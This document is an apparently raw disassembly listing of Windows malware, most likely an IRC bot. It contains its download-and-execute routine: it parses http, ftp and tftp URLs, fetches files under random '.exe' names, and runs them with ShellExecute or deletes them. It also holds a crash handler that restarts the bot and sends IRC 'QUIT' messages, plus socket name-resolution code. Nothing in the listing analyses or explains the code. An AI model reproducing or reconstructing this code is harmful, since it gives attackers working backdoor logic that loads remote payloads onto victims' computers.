mov eax, [ebp-6C0h]
add eax, [ebp-7E0h]
movsx eax, byte ptr [ebp+eax-638h]
test eax, eax
jz short loc_402C23
mov eax, [ebp-6C0h]
add eax, [ebp-7E0h]
movsx eax, byte ptr [ebp+eax-638h]
cmp eax, 2Fh
jnz short loc_402C7A
loc_402C23: ; CODE XREF: .text:00402C08�j
mov eax, [ebp-7E0h]
and byte ptr [ebp+eax-6D5h], 0
lea eax, [ebp-6D4h]
push eax
call sub_40422A
pop ecx
test eax, eax
jz short loc_402C75
mov eax, [ebp-6C0h]
lea eax, [ebp+eax-638h]
add eax, [ebp-7E0h]
push eax
mov eax, [ebp-6C0h]
lea eax, [ebp+eax-638h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov dword ptr [ebp-6C8h], 1
loc_402C75: ; CODE XREF: .text:00402C40�j
jmp loc_403251
; ---------------------------------------------------------------------------
loc_402C7A: ; CODE XREF: .text:00402C21�j
mov eax, [ebp-6C0h]
add eax, [ebp-7E0h]
movsx eax, byte ptr [ebp+eax-638h]
cmp eax, 30h
jl short loc_402CCE
mov eax, [ebp-6C0h]
add eax, [ebp-7E0h]
movsx eax, byte ptr [ebp+eax-638h]
cmp eax, 39h
jg short loc_402CCE
mov eax, [ebp-6C0h]
add eax, [ebp-7E0h]
mov ecx, [ebp-7E0h]
mov al, [ebp+eax-638h]
mov [ebp+ecx-6D5h], al
jmp short loc_402CD3
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: .text:00402C91�j
; .text:00402CAA�j
jmp loc_40324C
; ---------------------------------------------------------------------------
loc_402CD3: ; CODE XREF: .text:00402CCC�j
jmp loc_402BE5
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: .text:00402BD3�j
jmp loc_402BA8
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: .text:00402BBC�j
; .text:loc_40324C�j ...
push 7
push offset aHttp ; "http://"
lea eax, [ebp-638h]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402D37
cmp dword ptr [ebp-6C8h], 0
jnz short loc_402D13
push offset a80 ; "80"
lea eax, [ebp-6D4h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D13: ; CODE XREF: .text:00402CFE�j
lea eax, [ebp-631h]
push eax
lea eax, [ebp-638h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov dword ptr [ebp-6CCh], 1
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: .text:00402CF5�j
push 6
push offset aFtp ; "ftp://"
lea eax, [ebp-638h]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402DB7
cmp dword ptr [ebp-6C8h], 0
jnz short loc_402D6D
push offset a21 ; "21"
lea eax, [ebp-6D4h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D6D: ; CODE XREF: .text:00402D58�j
lea eax, [ebp-632h]
push eax
lea eax, [ebp-638h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov dword ptr [ebp-6CCh], 2
push offset aAnonymous ; "anonymous"
lea eax, [ebp-284h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aAnonymous ; "anonymous"
lea eax, [ebp-6BCh]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402DB7: ; CODE XREF: .text:00402D4F�j
push 7
push offset aTftp ; "tftp://"
lea eax, [ebp-638h]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402E0E
cmp dword ptr [ebp-6C8h], 0
jnz short loc_402DED
push offset a69 ; "69"
lea eax, [ebp-6D4h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402DED: ; CODE XREF: .text:00402DD8�j
lea eax, [ebp-631h]
push eax
lea eax, [ebp-638h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov dword ptr [ebp-6CCh], 3
jmp short loc_402E3D
; ---------------------------------------------------------------------------
loc_402E0E: ; CODE XREF: .text:00402DCF�j
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset unk_418500
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 0Ch
push dword ptr [ebp-63Ch]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402E3D: ; CODE XREF: .text:00402D32�j
; .text:00402DB2�j ...
lea eax, [ebp-638h]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp-6C0h], eax
jmp short loc_402E5F
; ---------------------------------------------------------------------------
loc_402E52: ; CODE XREF: .text:loc_402F11�j
mov eax, [ebp-6C0h]
dec eax
mov [ebp-6C0h], eax
loc_402E5F: ; CODE XREF: .text:00402E50�j
cmp dword ptr [ebp-6C0h], 0FFFFFFFFh
jz loc_402F16
mov eax, [ebp-6C0h]
movsx eax, byte ptr [ebp+eax-638h]
cmp eax, 40h
jnz loc_402F11
mov eax, [ebp-6C0h]
and byte ptr [ebp+eax-638h], 0
push offset asc_4184FC ; ":"
lea eax, [ebp-638h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp-7E4h], eax
cmp dword ptr [ebp-7E4h], 0
jz short loc_402ED8
mov eax, [ebp-7E4h]
and byte ptr [eax], 0
push 80h
mov eax, [ebp-7E4h]
inc eax
push eax
lea eax, [ebp-6BCh]
push eax
call sub_407A56
add esp, 0Ch
loc_402ED8: ; CODE XREF: .text:00402EB1�j
push 80h
lea eax, [ebp-638h]
push eax
lea eax, [ebp-284h]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp-6C0h]
lea eax, [ebp+eax-637h]
push eax
lea eax, [ebp-638h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402F16
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: .text:00402E7D�j
jmp loc_402E52
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: .text:00402E66�j
; .text:00402F0F�j
push offset asc_4184F8 ; "/"
lea eax, [ebp-638h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp-288h], eax
cmp dword ptr [ebp-288h], 0
jnz short loc_402F67
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset unk_4184CC
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 0Ch
push dword ptr [ebp-63Ch]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402F67: ; CODE XREF: .text:00402F36�j
mov eax, [ebp-288h]
inc eax
push eax
lea eax, [ebp-204h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp-288h]
and byte ptr [eax], 0
lea eax, [ebp-638h]
push eax
lea eax, [ebp-100h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp-6D8h], eax
and dword ptr [ebp-6C4h], 0
cmp dword ptr [ebp-6CCh], 1
jnz short loc_403009
push dword ptr [ebp-63Ch]
movsx eax, byte ptr [ebp-2A8h]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp-6C4h]
push eax
lea eax, [ebp-534h]
push eax
lea eax, [ebp-204h]
push eax
lea eax, [ebp-6D4h]
push eax
lea eax, [ebp-100h]
push eax
lea eax, [ebp-6BCh]
push eax
lea eax, [ebp-284h]
push eax
call sub_402698
add esp, 24h
mov [ebp-28Ch], eax
loc_403009: ; CODE XREF: .text:00402FB4�j
cmp dword ptr [ebp-6CCh], 2
jnz short loc_403065
push dword ptr [ebp-63Ch]
movsx eax, byte ptr [ebp-2A8h]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp-6C4h]
push eax
lea eax, [ebp-534h]
push eax
lea eax, [ebp-204h]
push eax
lea eax, [ebp-6D4h]
push eax
lea eax, [ebp-100h]
push eax
lea eax, [ebp-6BCh]
push eax
lea eax, [ebp-284h]
push eax
call sub_402A24
add esp, 24h
mov [ebp-28Ch], eax
loc_403065: ; CODE XREF: .text:00403010�j
cmp dword ptr [ebp-6CCh], 3
jnz short loc_4030B3
push dword ptr [ebp-63Ch]
movsx eax, byte ptr [ebp-2A8h]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp-6C4h]
push eax
lea eax, [ebp-534h]
push eax
lea eax, [ebp-204h]
push eax
lea eax, [ebp-6D4h]
push eax
lea eax, [ebp-100h]
push eax
call sub_402A2B
add esp, 1Ch
mov [ebp-28Ch], eax
loc_4030B3: ; CODE XREF: .text:0040306C�j
; .text:loc_403256�j
cmp dword ptr [ebp-28Ch], 1
jnz loc_403219
movsx eax, byte ptr [ebp-296h]
test eax, eax
jz short loc_4030D7
mov dword ptr [ebp-7ECh], offset aUpdating ; ", updating"
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_4030D7: ; CODE XREF: .text:004030C9�j
movsx eax, byte ptr [ebp-2A6h]
test eax, eax
jz short loc_4030EE
mov dword ptr [ebp-7F0h], offset aExecuting ; ", executing"
jmp short loc_4030F8
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: .text:004030E0�j
mov dword ptr [ebp-7F0h], offset byte_41DE30
loc_4030F8: ; CODE XREF: .text:004030EC�j
mov eax, [ebp-7F0h]
mov [ebp-7ECh], eax
loc_403104: ; CODE XREF: .text:004030D5�j
push dword ptr [ebp-7ECh]
mov eax, [ebp-6C4h]
shr eax, 0Ah
mov [ebp-7F8h], eax
and dword ptr [ebp-7F4h], 0
fild qword ptr [ebp-7F8h]
fstp dword ptr [ebp-7FCh]
call sub_416B64 ; clock
sub eax, [ebp-6D8h]
mov [ebp-804h], eax
and dword ptr [ebp-800h], 0
fild qword ptr [ebp-804h]
fdiv ds:flt_417270
fdivr dword ptr [ebp-7FCh]
push ecx
push ecx
fstp qword ptr [esp]
lea eax, [ebp-534h]
push eax
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset dword_41846C
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, byte ptr [ebp-2A7h]
test eax, eax
jz short loc_403198
lea eax, [ebp-534h]
push eax
call ds:dword_4170AC ; DeleteFileA
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: .text:00403187�j
movsx eax, byte ptr [ebp-2A6h]
test eax, eax
jnz short loc_4031AE
movsx eax, byte ptr [ebp-296h]
test eax, eax
jz short loc_403217
loc_4031AE: ; CODE XREF: .text:004031A1�j
movsx eax, byte ptr [ebp-2A3h]
neg eax
sbb eax, eax
inc eax
push eax
push 0
push 0
lea eax, [ebp-534h]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
mov [ebp-7E8h], eax
cmp dword ptr [ebp-7E8h], 20h
jbe short loc_4031F4
movsx eax, byte ptr [ebp-296h]
test eax, eax
jz short loc_4031F2
call sub_407148
loc_4031F2: ; CODE XREF: .text:004031EB�j
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: .text:004031E0�j
lea eax, [ebp-534h]
push eax
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset dword_418444
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 10h
loc_403217: ; CODE XREF: .text:00403196�j
; .text:004031AC�j ...
jmp short loc_40323C
; ---------------------------------------------------------------------------
loc_403219: ; CODE XREF: .text:004030BA�j
lea eax, [ebp-7DCh]
push eax
mov eax, [ebp-63Ch]
push dword ptr [eax]
push offset dword_418414
lea eax, [ebp-430h]
push eax
call sub_40D53F
add esp, 10h
loc_40323C: ; CODE XREF: .text:loc_403217�j
push dword ptr [ebp-63Ch]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_40325B
; ---------------------------------------------------------------------------
loc_40324C: ; CODE XREF: .text:loc_402CCE�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403251: ; CODE XREF: .text:loc_402C75�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403256: ; CODE XREF: .text:loc_402B8E�j
jmp loc_4030B3
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: .text:00402B89�j
; .text:00402E38�j ...
pop edi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_40A9CF+959�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_403271
jmp locret_403329
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: sub_403260+A�j
push 3AFh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40328A
jmp locret_403329
; ---------------------------------------------------------------------------
loc_40328A: ; CODE XREF: sub_403260+23�j
push 8
push 7Ah
push 61h
push 4
lea eax, [ebp+var_10]
push eax
call sub_410501
add esp, 14h
and [ebp+eax+var_10], 0
push offset a_exe ; ".exe"
lea eax, [ebp+var_10]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jnz short loc_4032BF
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_4032BF: ; CODE XREF: sub_403260+57�j
push 104h
push [ebp+arg_4]
mov eax, [ebp+var_14]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_14]
add eax, 108h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_14]
add eax, 20Ch
push eax
call sub_405F67
pop ecx
pop ecx
mov eax, [ebp+var_14]
add eax, 108h
push eax
mov eax, [ebp+var_14]
add eax, 4
push eax
push offset dword_4185FC
push 0
push [ebp+var_14]
push offset loc_402A32
call sub_4095A4
add esp, 18h
locret_403329: ; CODE XREF: sub_403260+C�j
; sub_403260+25�j
leave
retn
sub_403260 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 114h
push 1
push offset dword_41DE3C
call sub_409C88
pop ecx
pop ecx
mov [ebp-4], eax
cmp dword_41DE38, 0
jz loc_4034D9
mov dword ptr [ebp-8], offset aException_othe ; "EXCEPTION_OTHER"
mov eax, [ebp+8]
mov eax, [eax]
mov eax, [eax]
mov [ebp-110h], eax
cmp dword ptr [ebp-110h], 0C0000025h
ja short loc_4033A4
cmp dword ptr [ebp-110h], 0C0000025h
jz short loc_4033FA
cmp dword ptr [ebp-110h], 80000003h
jz short loc_4033DF
cmp dword ptr [ebp-110h], 0C0000005h
jz short loc_4033D6
cmp dword ptr [ebp-110h], 0C000001Dh
jz short loc_4033E8
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033A4: ; CODE XREF: .text:00403370�j
cmp dword ptr [ebp-110h], 0C000008Dh
jb short loc_403413
cmp dword ptr [ebp-110h], 0C0000093h
jbe short loc_40340C
cmp dword ptr [ebp-110h], 0C0000094h
jz short loc_4033F1
cmp dword ptr [ebp-110h], 0C00000FDh
jz short loc_403403
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033D6: ; CODE XREF: .text:00403394�j
mov dword ptr [ebp-8], offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: .text:00403388�j
mov dword ptr [ebp-8], offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033E8: ; CODE XREF: .text:004033A0�j
mov dword ptr [ebp-8], offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033F1: ; CODE XREF: .text:004033C6�j
mov dword ptr [ebp-8], offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033FA: ; CODE XREF: .text:0040337C�j
mov dword ptr [ebp-8], offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_403403: ; CODE XREF: .text:004033D2�j
mov dword ptr [ebp-8], offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_40340C: ; CODE XREF: .text:004033BA�j
mov dword ptr [ebp-8], offset aException_flt ; "EXCEPTION_FLT"
loc_403413: ; CODE XREF: .text:004033A2�j
; .text:004033AE�j ...
mov eax, [ebp+8]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_40342A
mov dword ptr [ebp-114h], offset aRestarting ; "Restarting"
jmp short loc_403434
; ---------------------------------------------------------------------------
loc_40342A: ; CODE XREF: .text:0040341C�j
mov dword ptr [ebp-114h], offset aContinuing ; "Continuing"
loc_403434: ; CODE XREF: .text:00403428�j
push dword ptr [ebp-114h]
push dword ptr [ebp-8]
mov eax, [ebp+8]
mov eax, [eax]
push dword ptr [eax]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0C0h]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0A4h]
mov eax, [ebp+8]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
mov eax, [ebp-4]
inc eax
push eax
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push offset dword_41864C
push offset aLast ; "#last"
call sub_40D4AB
add esp, 48h
loc_4034D9: ; CODE XREF: .text:0040334C�j
mov eax, [ebp-4]
inc eax
cmp eax, 64h
jz short loc_4034ED
mov eax, [ebp+8]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_403558
loc_4034ED: ; CODE XREF: .text:004034E0�j
push 104h
lea eax, [ebp-10Ch]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jz short loc_403545
push 0
push 0
push 0
lea eax, [ebp-10Ch]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
cmp eax, 20h
ja short loc_403538
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp short loc_403543
; ---------------------------------------------------------------------------
loc_403538: ; CODE XREF: .text:00403529�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403543: ; CODE XREF: .text:00403536�j
jmp short loc_403550
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: .text:0040350A�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403550: ; CODE XREF: .text:loc_403543�j
push 0
call ds:dword_41705C ; ExitProcess
loc_403558: ; CODE XREF: .text:004034EB�j
mov eax, [ebp+8]
mov eax, [eax]
cmp dword ptr [eax], 80000003h
jnz short loc_403583
mov eax, [ebp+8]
mov eax, [eax+4]
mov eax, [eax+0B8h]
inc eax
mov ecx, [ebp+8]
mov ecx, [ecx+4]
mov [ecx+0B8h], eax
or eax, 0FFFFFFFFh
jmp short locret_403586
; ---------------------------------------------------------------------------
loc_403583: ; CODE XREF: .text:00403563�j
push 1
pop eax
locret_403586: ; CODE XREF: .text:00403581�j
leave
retn
; ---------------------------------------------------------------------------
loc_403588: ; DATA XREF: sub_403BD3:loc_403D85�o
push ebp
mov ebp, esp
sub esp, 48h
cmp dword ptr [ebp+10h], 0
jz short loc_4035E2
mov eax, [ebp+10h]
cmp dword ptr [eax+4], 0
jz short loc_4035BB
mov eax, [ebp+10h]
cmp dword ptr [eax+4], 2
jz short loc_4035BB
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035BB: ; CODE XREF: .text:0040359B�j
; .text:004035A4�j
mov eax, [ebp+10h]
cmp dword ptr [eax+8], 1
jz short loc_4035E2
mov eax, [ebp+10h]
cmp dword ptr [eax+8], 2
jz short loc_4035E2
push 273Ch
call ds:dword_417234 ; WSASetLastError
mov eax, 273Ch
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035E2: ; CODE XREF: .text:00403592�j
; .text:004035C2�j ...
cmp dword ptr [ebp+8], 0
jnz loc_4036D6
push 30h
call sub_416B46 ; malloc
pop ecx
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jnz short loc_40360D
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: .text:004035FB�j
push 30h
push 0
push dword ptr [ebp-34h]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp-30h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov word ptr [ebp-30h], 2
cmp dword ptr [ebp+0Ch], 0
jz short loc_40364C
push dword ptr [ebp+0Ch]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp-2Eh], ax
loc_40364C: ; CODE XREF: .text:00403636�j
mov eax, [ebp-34h]
mov dword ptr [eax+4], 2
cmp dword ptr [ebp+10h], 0
jz short loc_403667
mov eax, [ebp+10h]
mov eax, [eax+8]
mov [ebp-38h], eax
jmp short loc_40366E
; ---------------------------------------------------------------------------
loc_403667: ; CODE XREF: .text:0040365A�j
mov dword ptr [ebp-38h], 1
loc_40366E: ; CODE XREF: .text:00403665�j
mov eax, [ebp-34h]
mov ecx, [ebp-38h]
mov [eax+8], ecx
cmp dword ptr [ebp+10h], 0
jz short loc_403688
mov eax, [ebp+10h]
mov eax, [eax+0Ch]
mov [ebp-3Ch], eax
jmp short loc_40368F
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: .text:0040367B�j
mov dword ptr [ebp-3Ch], 6
loc_40368F: ; CODE XREF: .text:00403686�j
mov eax, [ebp-34h]
mov ecx, [ebp-3Ch]
mov [eax+0Ch], ecx
mov eax, [ebp-34h]
mov dword ptr [eax+10h], 10h
mov eax, [ebp-34h]
add eax, 20h
mov ecx, [ebp-34h]
mov [ecx+18h], eax
and dword ptr [ebp-2Ch], 0
push 10h
lea eax, [ebp-30h]
push eax
mov eax, [ebp-34h]
add eax, 20h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+14h]
mov ecx, [ebp-34h]
mov [eax], ecx
xor eax, eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036D6: ; CODE XREF: .text:004035E6�j
push dword ptr [ebp+8]
call ds:dword_41723C ; gethostbyname
mov [ebp-14h], eax
cmp dword ptr [ebp-14h], 0
jnz short loc_4036F2
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036F2: ; CODE XREF: .text:004036E6�j
and dword ptr [ebp-20h], 0
jmp short loc_4036FF
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: .text:00403714�j
mov eax, [ebp-20h]
inc eax
mov [ebp-20h], eax
loc_4036FF: ; CODE XREF: .text:004036F6�j
cmp dword ptr [ebp-14h], 0
jz short loc_403716
mov eax, [ebp-14h]
mov eax, [eax+0Ch]
mov ecx, [ebp-20h]
cmp dword ptr [eax+ecx*4], 0
jz short loc_403716
jmp short loc_4036F8
; ---------------------------------------------------------------------------
loc_403716: ; CODE XREF: .text:00403703�j
; .text:00403712�j
cmp dword ptr [ebp-20h], 0
jnz short loc_403726
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_403726: ; CODE XREF: .text:0040371A�j
mov eax, [ebp-20h]
imul eax, 30h
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0
jnz short loc_40374C
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: .text:0040373A�j
mov eax, [ebp-20h]
imul eax, 30h
push eax
push 0
push dword ptr [ebp-1Ch]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp-10h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov word ptr [ebp-10h], 2
cmp dword ptr [ebp+0Ch], 0
jz short loc_403790
push dword ptr [ebp+0Ch]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp-0Eh], ax
loc_403790: ; CODE XREF: .text:0040377A�j
and dword ptr [ebp-18h], 0
jmp short loc_40379D
; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: .text:loc_4038A7�j
mov eax, [ebp-18h]
inc eax
mov [ebp-18h], eax
loc_40379D: ; CODE XREF: .text:00403794�j
mov eax, [ebp-18h]
cmp eax, [ebp-20h]
jnb loc_4038AC
cmp dword ptr [ebp+10h], 0
jz short loc_4037B9
mov eax, [ebp+10h]
mov eax, [eax]
mov [ebp-40h], eax
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: .text:004037AD�j
mov dword ptr [ebp-40h], 4
loc_4037C0: ; CODE XREF: .text:004037B7�j
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
mov edx, [ebp-40h]
mov [ecx+eax], edx
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
mov dword ptr [ecx+eax+4], 2
cmp dword ptr [ebp+10h], 0
jz short loc_4037F1
mov eax, [ebp+10h]
mov eax, [eax+8]
mov [ebp-44h], eax
jmp short loc_4037F8
; ---------------------------------------------------------------------------
loc_4037F1: ; CODE XREF: .text:004037E4�j
mov dword ptr [ebp-44h], 1
loc_4037F8: ; CODE XREF: .text:004037EF�j
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
mov edx, [ebp-44h]
mov [ecx+eax+8], edx
cmp dword ptr [ebp+10h], 0
jz short loc_403819
mov eax, [ebp+10h]
mov eax, [eax+0Ch]
mov [ebp-48h], eax
jmp short loc_403820
; ---------------------------------------------------------------------------
loc_403819: ; CODE XREF: .text:0040380C�j
mov dword ptr [ebp-48h], 6
loc_403820: ; CODE XREF: .text:00403817�j
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
mov edx, [ebp-48h]
mov [ecx+eax+0Ch], edx
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
mov dword ptr [ecx+eax+10h], 10h
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
lea eax, [ecx+eax+20h]
mov ecx, [ebp-18h]
imul ecx, 30h
mov edx, [ebp-1Ch]
mov [edx+ecx+18h], eax
mov eax, [ebp-14h]
mov eax, [eax+0Ch]
mov ecx, [ebp-18h]
mov eax, [eax+ecx*4]
mov eax, [eax]
mov [ebp-0Ch], eax
push 10h
lea eax, [ebp-10h]
push eax
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
lea eax, [ecx+eax+20h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
cmp dword ptr [ebp-18h], 0
jz short loc_4038A7
mov eax, [ebp-18h]
imul eax, 30h
mov ecx, [ebp-1Ch]
add ecx, eax
mov eax, [ebp-18h]
dec eax
imul eax, 30h
mov edx, [ebp-1Ch]
mov [edx+eax+1Ch], ecx
loc_4038A7: ; CODE XREF: .text:0040388C�j
jmp loc_403796
; ---------------------------------------------------------------------------
loc_4038AC: ; CODE XREF: .text:004037A3�j
mov eax, [ebp+14h]
mov ecx, [ebp-1Ch]
mov [eax], ecx
xor eax, eax
locret_4038B6: ; CODE XREF: .text:004035B6�j
; .text:004035DD�j ...
leave
retn 10h
; ---------------------------------------------------------------------------
loc_4038BA: ; DATA XREF: sub_403BD3+1BC�o
push ebp
mov ebp, esp
sub esp, 434h
cmp dword ptr [ebp+10h], 0
jnz short loc_4038CF
cmp dword ptr [ebp+18h], 0
jz short loc_4038D8
loc_4038CF: ; CODE XREF: .text:004038C7�j
mov eax, [ebp+20h]
and al, 0E0h
test eax, eax
jz short loc_4038ED
loc_4038D8: ; CODE XREF: .text:004038CD�j
push 2726h
call ds:dword_417234 ; WSASetLastError
mov eax, 2726h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4038ED: ; CODE XREF: .text:004038D6�j
mov eax, [ebp+8]
mov [ebp-40Ch], eax
mov eax, [ebp-40Ch]
movsx eax, word ptr [eax]
cmp eax, 2
jz short loc_403919
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403919: ; CODE XREF: .text:00403902�j
cmp dword ptr [ebp+10h], 0
jz loc_403ABA
mov eax, [ebp-40Ch]
push dword ptr [eax+4]
call ds:dword_41721C ; inet_ntoa
mov [ebp-434h], eax
cmp dword ptr [ebp-434h], 0
jnz short loc_403949
or eax, 0FFFFFFFFh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403949: ; CODE XREF: .text:0040393F�j
push 401h
push dword ptr [ebp-434h]
lea eax, [ebp-404h]
push eax
call sub_407A56
add esp, 0Ch
